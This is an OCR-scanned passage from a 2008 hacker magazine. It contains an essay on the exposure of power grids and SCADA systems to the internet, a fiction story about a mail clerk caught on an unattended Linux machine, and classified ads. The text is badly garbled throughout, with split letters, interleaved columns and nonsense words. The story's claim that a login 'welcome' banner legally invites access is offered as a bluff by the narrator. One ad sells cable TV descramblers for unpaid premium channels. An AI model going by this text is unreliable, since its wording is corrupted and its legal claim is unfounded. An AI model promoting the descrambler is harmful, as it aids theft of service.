qu i te i nevi tabl y end up on t hem.
i nternet ?
Most peopl e woul d be sur pr i sed t o know that
The short answer: Lazi ness and expedi ency.
el ectr i cal gr i ds, water di st r i but i on systems, and
Even as a secur i ty-consci ous network admi n-
many other cr i ti ca l i nfrastructure el ements are
i strator, I was i nevi tabl y confronted wi th si tua-
connected, one way or another, to the i nternet.
t i ons l i ke thi s one: Someone wou l d tel l me, "We
If they aren't connected to the i nternet, they are
have th i s computer that needs to pr i nt l abel s for
connected to modems for di al - i n access. Because
vi si tors to the uti l i ty."
of modems' l ow bandwi dth, we are seei ng l ower
"Ok, " I ' d t hi nk. "Sounds l i ke a standal one
uti l i zati on of modems as t i me goes on. Sh i vas
appl i cat i on. "
and ot her RAS devi ces have al l but dr i ed up, as
Then, I ' d be tol d, "We woul d al so l i ke to be
the appl i cati ons that used to requi re modems are
abl e to mai ntai n a l i st of vi si tors, " and sudden l y
now uti l i zi ng i nternet connect i vi ty.
the system needed to have a database. Yes, i t i s i ndeed poss i bl e to breach these
Fi nal l y, I ' d be asked, "Cou l d we al so have
systems wi t h root ki ts, buffer overfl ows, or other
access to that database from other l ocati ons on t r i cks of the trade; to i nsta l l VNC or other remote
the LAN and publ i s h the i nformati on on the access software and thus open and cl ose fl ood-
i nterna I web server?" Th i s means that I ' d need to gates or ga i n control of el ectri ca I gri ds; to com pro-
gi ve the system network access and easy access mi se medi cal computers wi th di agnosti c i mages;
for anyone, especi al l y an i ntruder. or to do other terri fyi ng t hi ngs. The potenti al for
Because network access al so i nevi tabl y mas s mayhem and massi ve l oss of l i fe cannot be
means i nternet access, we now have t he prover- overstated. The Uni ted States and many other
bi al hi ghway to hel l . Th i s mach i ne coul d have countri es have a t i ck i ng t i me bomb of massi ve
been standal one, if onl y the corporate manage- proport i ons wi th i n the I T i nfrastructure they have
ment ni twi ts had al l owed i t to be that way. grown addi cted to havi ng access to.
Other reasons for connect i ng machi nes to To date, I have not seen ,ny maj or catastro-
a network i ncl ude access to network pr i nters; phes rel ated to computer i nt r usi ons. By maj or
access to the machi ne for management reasons catastrophes, I mean events that wou l d make
such remote access or support, ant i vi rus updates, nat ural catastrophes l i ke Katr i na, earthquakes,
and the l i ke; or the need for the computer to be and tsunami s seer smd l l . I attri bute t hi s to
abl e to access or store fi l es on fi l e servers. i ncredi bl y good l uck and to the bet that the
So, beGlUSe I nformati on Tech nol ogy depart- peopl e thai w,mi t o har r us have noi speni any
ments are poor l y managed, and workers and si gn i fi cant effort, or they have not had the mental
adrn i ni strators al ready have an overabundance of acu i ty || percei ve the poss i bi l i ty of what they
dai l y work and art i fi ci al and rea l I T emergellci es,
cou l d accompl i s h.
i t i s expedi ent t o be abl e t o access al l computers,
Even though better secur i ty i s al ways an
workstat i ons, pr i nters, al arm systems, and so forth
opt i on, budgetary reasons usua l l y prevent i t from
fre' ' net"' Nk management consol es, I T depart-
bei ng pursued. VLANs do not orovi de substan-
Pa
g
e 56
2600 Ma
g
azine
t i ve secur i ty, as swi tch secur i ty is usual l y ques
t i onabl e. SNMP i s a secur i ty n i ghtmare, and
most swi tches i n use can be compromi sed wi t h
the typi cal publ i c and pr i vate SNMP commun i ty
stri ngs. VLANs and swi tch port assi gnments can
then be reass i gned rather eas i l y. So, i f VLANs
are not the answer, are separate networks a
poss i bi l i ty?
Somet i mes. But you know what happens.
I nevi t abl y there i s some "busi ness need, " usual l y
i magi nary, that necessi tates the connecti on of the
secure network to the mai n producti on, i nternet
accessi bl e network, t hus maki ng the "secure
network" i nsecure. The connecti on of secure to
producti on networks can be done t hrough a fi re
wal l , but t hi s is sti l l substant i al l y less secure t han
" not connected. " The l amentati ons and death
gasps of the networ k admi n i strator are for naught;
i f somethi ng can be connected wi th copper or
fi ber, i t wi l l eventual l y be connected.
Onl y i n rare cases, i n compani es or govern
ment organi zat i ons that have some grasp of secu
r i ty, do we end up wi th computer faci l i t i es that
are secure from the i nternet. Thi s i s the excepti on
rather t han the nor m.
I n Bruce Wi l l i s ' s movi e Live Free or Die Hard,
Bruce Wi l l i s and the ki d hacker have to phys i
cal l y go t o el ectr i cal transmi ssi on and generat i on
centers to get access to the power gri ds. Thi s,
unfortunatel y, i s wi shfu l th i nk i ng.
The i nnocent questi on posed by the orr
The Hook host has very real and demonstrabl y
dangerous rami fi cati ons t hat are preval ent
t hroughout the i nfrastructure of t he Uni ted States
and the wor l d.
The best answer for why a computer i s
connected t o the i nternet i s because i t can be
done.
The way to mi t i gate t hi s probl em i s t o have
good secur i ty personnel that are a l l owed to
perform t hei r j obs. Th i s means havi ng a secur i ty
pol i cy that is adhered to us i ng secur i ty devi ces
that provi de a s i gn i fi cant l evel of l ayered secu
ri ty, usi ng secur i ty devi ces t hat are themsel ves
secure, us i ng appl i cati ons and operati ng systems
that are secure, and havi ng secure vi rus protec
t i on, whi ch may in fact not be poss i bl e. The best
secur i ty pol i cy for any mach i ne i s for i t to have
no network connecti on, no modem, no soft
ware updates, and no ant i vi rus software, and for
a l l i nput to be entered by a l i ttl e ol d l ady from
Kentucky. Why no ant i vi rus software? Because,
as some of my referenced mater i al and other
i nternet-accessi bl e mater i al poi nt out, ant i vi rus
software i s rampant wi t h i nsecure codi ng that
can i tsel f be an attack vector for compromi s i ng a
computer. So, scan the machi ne wi t h an ant i vi r us
program when i t i s set up, but don ' t i nsta l l any
anti vi rus software. I ndeed, after the i n i t i al i nstal l ,
don't i nsta l l any addi t i onal software. I f i t works,
don't fi x i t; i f i t ' s secure, don ' t booger i t up or
ri sk a vi rus i nfecti on by addi ng new software.
Remove t he fl oppy dr i ve, and put gl ue from a
gl ue gun i nto the network, modem, and USB
ports. Why t he I i ttl e ol d l ady from Kentucky? She
does n' t f i t t he hacker profi l e, but are we real l y
sure about her? I th i nk I saw a copy of 2600 and
a Phrack pri ntout i nsi de her handbag, al ong wi t h
a USB t humbdri ve l abel ed "root ki ts. "
Some of these secur i ty measures are not
wi th i n t he grasp of some busi ness envi ronments,
but some of them are poss i bl e, wi t h the most
fundamental and most cr i t i cal pi ece bei ng the
secur i ty pol i cy.
What is the best reci pe for a good secur i ty
pol i cy? That is the topi c for another art i cl e.
Even i f the enti ty respons i bl e for mai n
tai n i ng t hat gri d uses someth i ng approach i ng a
reasonabl e secur i ty pol i cy, they are connected,
presumabl y over a secure network (yeah, r i ght) ,
to computers mai nta i n i ng downstream di stri bu
ti on gr i ds t hat are not as secure. You are onl y as
secure as t he weakest l i n k i n your armor, and
smal l er di str i but i on gr i ds are the Ach i l l es' heel
of el ectr i cal gri d secur i ty. Rel ated to t hi s, SCADA
(System Control And Data Acqu i si t i on) , whi ch
i s used t o control el ectri cal and hydro faci l i t i es,
has i ts own set of secur i ty probl ems. A faci l i ty i n
I daho, mai ntai ned by t he Department of Energy,
performs research i nto cybersecuri ty i ssues that
pertai n to SCADA systems. They perform demon
strati ons for i nterested, Government-approved
parti es to show how SCADA systems can become
compromi sed.
References
A concentrated attack on SCADA, EMS,
"Anti -vi rus protecti on gets worse,"
tel ephone, traffi c control , E91 1 , and I nternet
h t t p : / / www . channe l r e g i s t e r . c o . uk /
2 0 0 7 / 1 2 / 2 1 / dw i n d l i ng_an t i v i r u s
servi ces i s the current-day cyber-armageddon .
-prot ect ionl
I ndustry representati ves rant t hat such a scenar i o
"Uni x admi n tri ed t o axe power gri d, "
i s beyond the bounds of poss i bi l i ty, but we know h t tp : / / www . i n f owor l d . c om / c g i. - b i n /
better, don't we?
r e di I e c t ? s o u r c e rs s & u r l
=
h t lp : 1 /
I won' t spel l out, anymore than I al ready
www . i nf oworld . com/ ar t i c l e / 0 7 ! 1 2 ! 1 4 /
have, how such a n i ghtmare scenar i o cou l d be
Un i x - admi n - t r i e d - t o - ax e - powe r -
achi eved, but t he astute reader shoul d be abl e
gri. d_l . htrl
to read between the l i nes, to Googl e or Wi ki -
"Haxdoors of t he Kaspersky Anti vi rus 6/7, "
h t t p : / / r o o t k i t . c o m / n e w s r e a d
pedi a anythi ng they need to know more about,
. php? news i d
=
7 7
8
and to arri ve at a concl usi on s i mi l ar to mi ne. Al l
"Computers ' I nsecure Securi ty, "
of the typi cal attack vectors are i n pl ay: i nternet
h t t p : / / ww w . b u s i n e s s w e e k . c o m /
access, secur i ty vul nerabi l i ti es i n computers and t e c h n o l o g y / c o n t e n t / j u n 2 0 0 5 /
networks, and sari 'l engi neeri ng.
tc2 0 0 5 0 6 1 7_1 6 1 3_tc0 2 4 . htm
Summer 2008 Pa
g
e 57
by Peter Wrenshal l "I t' s none of my bus i ness, " I thought. But
as I say, i n those days I was fi xed on the i dea
I enj oy readi ng your magazi ne, and though of worki ng wi th computers, and i t wasn ' t l ong
am not a computer hacker or cracker, I before my cur i osi ty got the better of me. I went
thought you mi ght be i nterested to hear about i nto the offi ce, and crouched down to take a
how l ance nearl y got arrested for hack i ng and l ook. There was a manufacturer ' s decal on t he
ended up worki ng as a secur i ty consu l tant. front of the mach i ne but noth i ng el se. I l ooked
I t happened wh i l e I was cl er ki ng for one of around for some tag or l abel to tel l me what
the bi g haul age fi rms. The j ob i nvol ved traci ng mach i ne i t was and, more t o the poi nt, what
del i very trucks, photocopyi ng documents, and i t was doi ng al one i n a deserted room, but t he
del i veri ng mai l , even though t hi s was twenty mach i ne was as bare as the room i t was i n .
years after t h e experts announced t h e arri val A network cabl e came out of t h e back and
of the paperl ess offi ce. I t was hass l e from n i ne went i nto a socket on the wal l , so I fi gured
to five. From the fi rst day, I wanted to qu i t, but that the computer was sti l l i n use as part of
havi ng l eft school two years ear l i er at s i xteen, someone' s not-qui te-dead proj ect, or that i t
I di dn' t exactl y have many career choi ces. I had s i mpl y been forgotten about. The noi sy
was studyi ng at n i ght school to become a hard di s k whi rred, di ed, and then whi rred
computer networ k engi neer, but I was t hree igi i n, iS if t he mich i ne WiS doi ng some work
exams away from bei ng qUil i fi ed. i n the background, or had become stuck i n
The onl y good th i ng about the j ob was the i nfi n i te- l oop that 1 960s sci ence fi cti on
that I was free to wander around the enti re foretol d. I l ooked at the screen fi l l ed wi th
bui l di ng wi th the mai l cart. Wi th i n a few days error messages. Whatever program had been
of starti ng, I had found a deserted part of the run n i ng, i t had wel l and tru l y fal l en over, s i nce
bui l di ng, the east wi ng of the s i xth fl oor, where the command- l i ne was ava i l abl e, l eavi ng the
I cou l d go and s l ack off, and l ook down at a l l mach i ne tota l l y open.
the rat racers run n i ng t o and from t hei r i nter- The cursor bl i n ked at me, as i f t o say,
esti ng, hi gh-payi ng j obs. Even better, I cou l d " Pl eise hel p me, for I am broken. "
get some coursework done. I ' ve al ways l i ked computers, and they' ve
On the Fri day of my fi rst week, I hi d a pi l e al ways l i ked me, s o I was happy t o reboot t hi s
of study notes under a stack of mai l and rol l ed mach i ne to a l l ow i t to conti nue the l abors the
the mai l cart up to the s i xth fl oor. I wal ked past anci ents had set for i t. But fi rst I thought I ' d
the si gn showi ng what the spi ffy conference have a l i ttl e l ook, you know, j ust to see what
su i te they were bui l di ng up there woul d l ook operat i ng system i t was run n i ng.
l i ke when i t was fi n i shed, and I went i nto one Bendi ng l ow to type on the keyboard, I
of the empty offi ces. I opened my notes, and opened a few fi l es and soon found out the
started readi ng about I P versi on si x. I hadn' t mach i ne was run n i ng an ol d versi on of Li nux.
been studyi ng l ong when I noti ced a persi stent I was j ust consi der i ng whether I shou l d open
tappi ng sound. I l ooked around, but there was the password fi l e, to add my own user account,
noth i ng i n the room, whi ch was bare. There when I heard the voi ce of doom beh i nd me.
wasn ' t even any carpet. I went out i nto the "What are you doi ng?" i t demanded.
corri dor and peered i nto the offi ce next door. I typed the exi t command and hi t enter.
On the concrete fl oor, al most h i dden from After the screen had cl eared, I turned to see
vi ew, was an anci ent computer workstat i on, some guy i n hi s forti es, wear i ng overa l l s .
whi ch l ooked l i ke i t had been bui l t not l ong " Noth i ng, " I sai d, weakl y. I went t o l eave,
after the di nosaurs had di ed out. I cou l d see but he was a hefty guy, and he bl ocked the
that error messages had fi l l ed the screen. doorway. "Wai t there, " he sai d. He pul l ed out
Pa
g
e 58
2600 Ma
g
azine
a mobi l e phone and di al ed. " No, defi n i tel y not . I was j ust l ooki ng. "
"Hel l o? " he growl ed i nto the handset. To "Yes, but I don ' t get why wou l d you be
cut a l ong story short, the room soon fi l l ed i nterested i n it, anyway. What bus i ness is it of
wi t h peopl e, most of them wear i ng su i ts that your s? "
wou l d have taken a quarter of my year l y sal ary I shr ugged. " I wondered what had gone
to buy. The onl y one to i ntroduce h i msel f was wrong wi t h i t. The screen was ful l of errors. " I
Barker. He was, he sa i d, the IT manager. stopped tal ki ng, hopi ng that it was expl anati on
"Who are you, and what were you doi ng enough. When that di dn' t get any response
wi th that computer?" he sai d. from Bar ker, I conti nued.
" I ' m Karl Ri pl ey. I noti ced t he mach i ne had " I ' m tak i ng a n i ght-school course i n
crashed, " I repl i ed, avoi di ng any reference to computers, and there' s a troubl eshooti ng
my bei ng a mai l cl erk on my fi rst week. modul e. I t hought t hat I mi ght recogni ze t he
"Tamper i ng wi t h computers i s an offense. " errors. "
"Cri mi nal offense, " added t he admi n, j ust Barker l ooked around at t he s ui ts, to see
i n t i me for the arri vi ng securi ty guard to hear i t. how they took my expl anati on. Then he l ooked
There was a l u l l i n the cross- questi oni ng wh i l e me over, a n d I real i zed that he j ust wanted to
everybody seemed to be wai t i ng for me to get r i d of me. L i ke most IT managers, he prob
say someth i ng. A coupl e of Mi crosoft mi nutes abl y had twel ve hours of work to fi t i nto an
went by, but I cou l dn' t fi nd anyth i ng t o say. ei ght-hour workday.
My brai n was s l owl y fi l l i ng wi th i mages of me " Look, " he sai d, " I ' m goi ng to gi ve you the
push i ng a mai l cart around the Cedar Creek benefi t of t he doubt t hi s ti me, because i t' s you r
Federal Correct i onal Faci l i ty. I wondered what fi rst week here, and you obvi ousl y don ' t know
ki nd of j a i l t i me does hacki ng carri ed. the l ocal ru l es. B ut from now on, thi s sect i on
" I was n' t tamperi ng, j ust l ooki ng. I know I i s off- l i mi ts. And if you see any probl ems wi t h
shou l d have phoned t he hel pdesk, but i t ' s my any other computers, then do us a l l a favor and
fi rst week here, and I forgot the number. " Actu- j ust ri ng t he hel pdesk. Don ' t stand l ooki ng at
a l l y, I had never known i t. The onl y comput i ng the screen, because around here . . . "
that genera l cl erks were a l l owed to do was I fel t t he tensi on i n my body van i sh, and I
computi ng the square root of noth i ng. was j ust about to start breath i ng aga i n when
"Th i s ki d cou l d have been hacki ng, " the guy i n overal l s, t he one who had found
t he admi n sai d. " I t h i n k we shou l d cal l t he me, i nterrupted Barker.
pol i ce. " My stomach di d a somersau l t. Obvi - " I tol d you, he was n' t j ust l ooki ng at the
ousl y, th i s crufty- I ooki ng workstati on hel d screen, " he sai d. "He was typi ng on t he keys. "
some sort of commerci al data, l i ke the payrol l I ' d forgotten he was there. The whol e room
deta i l s for the l ast ten years or the fi l e on t umed to l ook at h i m, and Barker gl ared at
who won Offi ce Cl erk of the Month . I l ooked h i m, as i f he was annoyed at h i m for maki ng
around at t he crowd. Nobody obj ected t o t he a bi g deal out of noth i ng. The j an i tor gl ared
admi n ' s suggest i on. I saw the secu ri ty guard back. Maybe, I thought, he al so used t he s i xth
move s l i ght l y to hi s l eft, bl ocki ng t he exi t a fl oor for sl acki ng off or brewi ng moonsh i ne or
l i ttl e more, and I fel t t he fi rst drop of sweat someth i ng, and I had i ntruded on h i s t urf.
run down my forehead. Onl y Barker l ooked "I saw h i m, " he added defensi vel y. Barker
unconcerned. turned back to me. Hi s eyebrows rose as he
"Let ' s not overreact," he sai d. "Some- wai ted for an answer. There was no sense
body wal ks i nto an open offi ce and l ooks at a denyi ng i t.
computer, i t' s hardl y a fel ony." "I onl y cl eared the screen, " I sai d. "I was
"Th i s area is cl osed off," the admi n sa i d goi ng t o cal l i t i n t o the hel pdesk when I
defensi vel y. " Nobody is a l l owed up here. " got back downstai rs. " That was l ame, and I
Barker turned back to me, and sai d, "What cri nged whi l e sayi ng i t. Barker l ooked more
are you doi ng i n t hi s sect i on, anyway? " di sappoi nted t han annoyed.
" I push my cart t hrough here, " I sai d, a "Can you check what he typed on that
bi t breat hl ess l y. "I t ' s shorter t han goi ng back mach i ne? " he asked the admi n .
t hrough t h e other sect i on twi ce. " " Poss i bl y, " was the admi n ' s repl y. He
I t a l l sou nded i nnocent enough, whi ch i n a sounded uns ure. That was a good s i gn. I n
way i t was. Barker l et out a weary breat h. my experi ence, i t ' s rare to fi nd an admi n i s-
" I don ' t have t i me for t hi s, " he sai d to trator who is as good wi th Li nux as he is wi t h
no one i n parti cul ar. He l ooked at me, and Mi crosoft Wi ndows. I t ' s l i ke fi ndi ng someone
t hen l ooked at the machi ne, then back at me who can wr i te wi t h thei r l eft and r i ght hands
aga i n . equal l y wel l . Most peopl e I knew used ei ther
"You di dn' t do anyth i ng wi t h that Wi ndows or Li nux. I was hopi ng t he admi n
mach i ne? " standi ng at t he workstat i on fel l i nto t he
Summer 2008
Pa
g
e 59
Wi ndows category. per haps wonderi ng if what I had sai d made
" I ' l l check the hi story l og, " he sa i d. My sense. I was n' t s ure mysel f. My L i nux ski l l s
hope of hi m not knowi ng L i nux vani s hed, were not exact l y bri l l i a nt, but I was hopi ng
and my heart sank. The hi story l og on Li nux that they were better t he admi n-from- hel l ' s.
i s the fi l e t hat keeps track of every command "Who are you ? " Barker sai d sudden l y. Then
typed, and I knew that i t wou l d have a l i st of he rephrased i t. "I mean, you don ' t work i n my
my recent act i vi ty. As I say, I am not much department. What i s i t you do here? "
of a hacker, and hadn' t bothered t o del ete " I work i n t he mai l room, " I croaked,
a nyth i ng to cover my tracks. I hadn ' t expected whi ch had an even better effect on the su i ts
there was goi ng to be an i nvesti gat i on. Thank t han t he hi story-fi l e remar k. Barker l ooked
god I hadn' t created a user account . " Hacker arou nd, cl ear l y puzzl ed. The admi n l ooked at
creates backdoor to stea l commerci al secrets, " me, and I knew he knew he cou l dn' t back up
t he headl i nes wou l d have sa i d. h i s accusati on. I a l so knew that I ' d made an
The admi n l ogged on t o t he mach i ne, and I enemy forever. Offi ce enemi es, though, I can
watched hi m open the hi story fi l e for the root l i ve wi t h.
user. " You can' t l et h i m go, " the admi n sai d.
"He' s been l ooki ng i n t he process di rec- " Those commands must have come from
tory," he sa i d. He l ooked up wi th an outraged hi m. "
expressi on l i ke a TV l awyer, onl y l ess s i ncere. "You don ' t have any evi dence, " sai d
"What does t hat mea n? " snapped Bar ker. Barker.
"He was probabl y tryi ng to fi nd out what " He was seen typi ng by a wi tness. It is a
servi ces are ava i l abl e. " cr i mi nal offense t o access a computer t hat you
Ba rker tu rned back to me, assumi ng the are not aut hor i zed to use. I f you don ' t ca l l the
fu l l aut hor i ty of h i s offi ci al rol e. pol i ce, I wi l L" He uncl i pped a mobi l e phone
" Di d you type those commands ? " he fr om hi s bel t. He was goi ng to use i t. I had
demanded, j abbi ng hi s fi nger at the screen. another vi si on, one of my career bei ng over.
Unt i l t hen, I had wa nted to be honest, and Not onl y that, but these peopl e were from
i f i t had been j ust Barker on h i s own, I ' d have one of the bi ggest compani es i n the country.
tol d h i m what I had done. Even though what They di dn' t dea l i n di mes; they were used to
I ' d done was n' t i tsel f a cr i me, I knew that worki ng wi th mi l l i ons of dol l ars dai l y. When
someone somewhere cou l d probabl y make asked to assess the damages to thei r suppos
a three-act courtroom drama out of i t. They' d edl y- hacked network, they' d have no troubl e
l awyer u p and hang me out t o dry, I knew i t. cooki ng up some seven-fi gure sum to put i n
S o I l i ed. front of a j udge. I got a hol l ow feel i ng i n my
"Wh i ch commands? " I s ai d i n nocentl y. The stomach. I knew that even i f I di dn ' t get j a i l ed,
admi n hel pfu l l y stepped away from bei ng i n I ' d have a hacki ng rap on my record, a n d then
front of the screen, and I made a pretense of nobody was ever goi ng to h i re me to work
l ooki ng at the evi dence. There on the screen i n computers ever aga i n . I was goi ng to be a
were the commands I had used to i nspect the fi fty-year-ol d genera l cl erk, sti l l l i vi ng wi th my
machi ne. But I soon rea l i zed that i n hi s eager- parents, hopi ng to have a heart attack j ust so I
ness to prove hi s poi nt, the admi n had made a di dn' t have to push that cart around an offi ce
mi stake. Not onl y was he not a L i nux guru, he I hated.
was n' t much of a n admi n, ei ther. We stood i n s i l ence for a moment, the
" No, " I sai d, fi rml y. "That j ust tel l s you what admi n poi sed to di a l . I cou l d see the secu
the l ast commands were. I t does n' t tel l you r i ty guard tens i ng hi s hands, gett i ng ready for
who typed them, or when they were typed. I t acti on. I n the s i l ence, I heard the machi ne' s
cou l d have been anybody. And i t cou l d have noi sy hard di s k spi n up agai n, and start whi r-
been weeks ago. " r i ng, and I l ooked at the screen. And then I
I thought I saw a h i nt of a s mi l e appear had my second brai n wave of the mor ni ng.
on Bar ker ' s face, whi ch was qu i ckl y repl aced "I t' s not a cri mi na l offense, " I sai d. " Not on
wi t h hi s offi ci al express i on. I had i mpressed that computer. "
the s ui ts, too. A few rai sed expectant eyebrows I wai ted for Barker to say someth i ng, but
toward the admi n . Ther e i s a s urpri s i ng l ack nobody sai d a word. I poi nted at the screen,
of bi as i n management sti ffs. Sure, they obvi - where the admi n had j ust l ogged i n .
ous l y enj oy a good feedi ng frenzy, bu t you ' d "Your system says 'wel come' whenever
thi n k they' d automati cal l y cheer for the guy anybody l ogs i n . "
i n the most expensi ve sui t, and t hat ' s not true. Every head i n the room turned to l ook at
I nstead, i t ' s a case of l i ne ' em up and may the the screen. There at the top was the message
best man wi n. of t he day, t he text that accompani es every
Barker stood there s i l ent l y, l ooki ng at me, l ogon . Ri ght next to the name of the company
Pa
g
e 60
2600 Ma
g
azine
was the word "Wel come. "
"A wel come can be l ega l l y construed as an
i nvi t at i on. Pl us there was no warn i ng t hat t hi s
i s a restri cted system. "
I watched my audi ence, thei r busi ness
bra i ns di gest i ng the i nformati on .
"And, s i nce the program had crashed, and
I hadn ' t actual l y l ogged i n, " I added, "then
legal l y spea ki ng I haven ' t done anyth i ng
wrong. " Ba rker turned to the admi n .
"I s that true?" h e asked. The admi n stood
there, hol di ng hi s phone, a nd tens i ng hi s j aw.
He di dn ' t repl y. Actua l l y, I had no idea i f i t
was true, ei t her. Ba rker l et out a l ong breath
t hrough hi s nose, t hen spoke aga i n .
" How ma ny other machi nes have we got
l i ke that ?" He was n' t hol di ng back now. He
was seri ousl y annoyed, a nd he was l ett i ng t he
admi n have i t . Lucki l y for me, there was some
admi ni strat i ve tu rf-wa r goi ng on betwef' n the
two. Offi ce pol i t i cs: don ' t you j ust l ove i t ?
"I don ' t know, " sa i d t he admi n, rel u cta nt l y.
"You ' l l have to ask B i l l . I t ' s hi s box. " I gat hered
that B i l l was the company' s UNI X wi zJrd.
" But t hi s ki d shou l dn ' t be t ouch i ng i l."
"I t shou l dn ' t be on the fl oor i n an empty
offi ce. What ' s i t dIi ng i n here a nyway? "
snapped Ba rkfL The ddmi n was goi ng to say
someth i ng, but Bil rh'r preempted h i m.
"You ' d better gpt Bi l l up here today. I don ' t
care what h e ' s doi ng; tel l hi m t o get up here
now. We need the stJ nda rd wari ng message
on every L i nux mach i ne, today. "
" But t here are dozens of t hem, " sai d the
admi n, a bi t whi ney.
"I t ' s s i mpl e. J ust change the message of t he
day," I suggested hel pfu l l y.
Ba rker shot me a l ook, and I s hut my
mouth, a nd l ooked su i tabl y ser i ous. Cont ri te, I
th i nk is the word.
"J ust get i t done, " he s ai d t o the admi n .
"And get t h i s mach i ne ou t of here a nd i nto the
server room. "
The admi n was outranked, and he knew i t .
He nodded si l ent l y. At t he back of every offi ce
drone' s mi nd is the mortgage he has to pay.
More l i kel y, the admi n was s i mpl y fol l owi ng
the route t o t he top that the ads secret l y
suggest: obey s i l ent l y, and one day you can
be the wi nner of the rat race. Bar ker t urned
to me.
"Go back to your work, and i f you touch
another machi ne i n here, I ' l l persona l l y ca l l
the pol i ce. "
" I won ' t, " I sai d. "Thanks. "
I headed to the door. The guard stepped
asi de to l et me pass, and I left h i m and the
I nqui si t i on to thei r post-event di scussi on and
went out . I grabbed t he cart and hust l ed a l ong
the corri dor as fast as my wheel s wou l d go. I
hi t the button to fetch the el evator, and I cou
hear the su i ts fi l i ng out of the room, thei r spec
tator sport over wi t h, goi ng back to wri t i ng
memorandums t o t he board. The door opened
and I got i n. As the el evator descended, I sai d
a si l ent prayer t o whomever t he patron sa i nt of
hackers is, and qu i et l y resol ved t hat my fi rst
born ma l e ch i l d wou l d be named Barker.
I exi ted on the ground fl oor, a l most
col l i di ng wi th one of the j uni or cl erks who
was a l ways buggi ng me about putti ng her ma i l
on the des k i nstead of i n the proper tray.
"Oops, " I sa i d, wi th a fri endl y smi l e. She
was cute, a nd I guess the recent exci tement
had ca ught me off gUJrd, the adren a l i n had
gi ven me confi dence, or someth i ng, a nd so I
sai d, " How' s it goi ng? " or words to t hat effect.
She wa l ked away wi thout sayi ng a nyth i ng, t he
perfect end to a perfect day.
I went down thf' corr i dor a nd i nt o t he ma i l
room, a nd I stayed there unt i l fi ve o' cl ock. I t ' s
fu nny how J c l ose br ush wi t h i mpr i sonment
CJn mil ke ma i l sort i ng seem l i ke fu n.
I never found out whit WiS on t hat wok
stJt i on or why i t WJS i n t hat lmpt y room,
il nci I never Jskpd. But I di d get a ca l i |n t he
fol l owi ng MondJY. I t was Bi rk( ' r. l I wanted
to know if I wou l d l i ke to wor k for h i m i n t he
I T depi rt mpnt . He sa i d t hil t np('(it' d '|HC|||
wi t h L i nux s k i l l s . Of (ou rs!, I acct 't !d, , md H
few mont hs of study J nd t hrf'P t' X,l ms l ater, I
wHs gi ven the offi ci il l t i t l e of nCt wor k Pil gi neer.
Basi ca l l y, I get pa i d to pl ay wi t h nl' t works, to
see where t he secur i t y hol e, are, a nd occa
si ona l l y to swap out H broken swi t ch.
These days, I can afford t o buy computer
equ i pment from t hi s cent ury. I nC'Vr went
back to H l i fe of cr i mi nal hacki ng, a nd I ' ve
never had to push a ca rt a round a n of( | ever
aga i n-so far. But I did manage to bump i nto
that cl erk, the one I col l ided wi th on my fi rst
week. Th i s t i me, I got H s mi l e, a nd as I watched
her wal k away, I noti ced a bi t oj a sway in her
hi ps that hadn' t been there before.
I ' d tel l you about how the computer on
her desk devel oped a network faul t that onl y
I cou l d f i x, but you can probabl y guess the
detai l s.
Have an interestng fctonal stor
concering hackng tat YOI'd lke to
test Olt on olr readers?5end i on in
to art des@2600, cm. Please teN IS
it' fiton so w don't inadverenly
spread a pack of Hes.
Summer200B
;
Happeninus
PHREAKNI C 1 Z. Nashvi l l e 2600 i s once agai n proud to present
PhreakNI C 1 2, hel d every year i n Nashvi l l e, TN. We are hol di ng
t hi s technol ogy conference i n the same l ocati on as the past
' years, the Days I nn at the Stadi um on October 24th-2 6th,
2 008. Vi si t http://phreakni c. i nfo for the l atest i nformati on,
i ncl udi ng hotel booki ng i nformati on and pre-regi strat i on.
Cal l ( 61 5) 254- 1 5 5 1 and menti on "PhreakNI C" f or the speci al
rate of $67/ni ght.
For Sale
SECURITY SYSTEM FOR SALE, under $ 1 00 and no mont hl y
fees. I am sel l i ng secur i ty systems t o protect your computer or
personal space such as a dormi tory or apartment, etc. Thi s covert
al ar m system ca l l s your cel l phone on detecti on of i ntrusi on,
then al l owi ng you to use your cel l phone to hear the i ntruder's
acti vi ti es t hrough a sound ampl i fied mi crophone on the uni t .
Thi s a l arm system i s di sgui sed as an orri nary house phone and
i s al so a wor ki ng phone! (Great for offi ces. ) Best secur ity system
money can get for under $ 1 00 and no mont hl y fees. Order now
for $75 onl y at www. CNC- Di stri buti on. com/CNC
MAC SPYWARE- anti -spyware f or the Mac |' X, detects,
i sol ates, and removes spyware and over 8000 tracki ng
cooki es. Thi rty day free t ri al - http://macscan. securemac. com/
- Hel p us promote Mac$can, receive a free copy, and swag -
macsec@securemac. com for detai l s.
CRACKER FRI ENDLY GLASS TOBACCO PI PES, water pi pes,
chamber pi pes, and accessori es. Li qu i dati on <al e! For those
pul l i ng al l - n i ghters who need hel p focusi ng. Free shi ppi ng for
orders over $30. Ema i l kur l i e1 984S @yahoo. com for pics and
quest i ons. Must be 1 8!
CABLE TV DESCRAMBLERS. New. Each $45 + $5 shi ppi ng,
money orderlcash onl y. Works on anal og l anal og/di gi tal
cabl e systems. Premi um channel s and possi bl y PPV dependi ng
on system. Compl ete wi t h 1 1 0vac power suppl y. Purchaser
assumes sol e responsi bi l i ty for noti fyi ng cabl e operator of use of
descrambl er. Requi res a cabl e TV converter ( i . e. , Radi o Shack) to
be used with the uni t. Cabl e connects to the converter, then the
descrambl er, then the output goes to TV set t uned to channel 3 .
CD 962 1 Ol i ve, Box 2 8Q92-TS, Ol ivettet Sur, Mi ssouri 63 1 32 .
Emai l : cabl edescrambl erguy@yahoo. com.
TV-8-GONE. Turn off TVs i n publ i c pl aces! Ai rports, restaurants,
bars, anywhere there's a TV. Now avai l abl e as an open source
ki t, as wel l as the super-popul ar or i gi nal keychai n. The kit turns
off TVs at 40 yards! And now, for professi onal s, the TV-B-Gone
Pro turns off TVs up to 1 00 yards away! 26UU readers get 1 0%
di scount on TV-B-Gone keychai ns - use Coupon Code: 2 600.
www.TVBGone. com
JEAH. NET supports 26UU, because we read too! J EAH. NET
conti nues to be # 1 for fast, stabl e FreeBSD shel l accounts wi t h
hundreds of vhost domai ns, FreeBSD and Pl esk web hosti ng,
1 00% pri vate and secure domai n regi strati on, and aggressive
merchant sol ut i ons. 26UU readers' setup fees are al ways wai ved
at J EAH. NET.
J ! NX-HACKER CLOTHI NG/GEAR. Tired of bei ng naked? J I NX.
com has 300+ 1's, sweatshi rts, sti ckers, and hats for those
rare t i mes that you need to leave your house. We've got swag
for everyone, from the buddi ng nOObl et to the vi ntage geek.
So take a five mi nute break from surfi ng prOn and check out
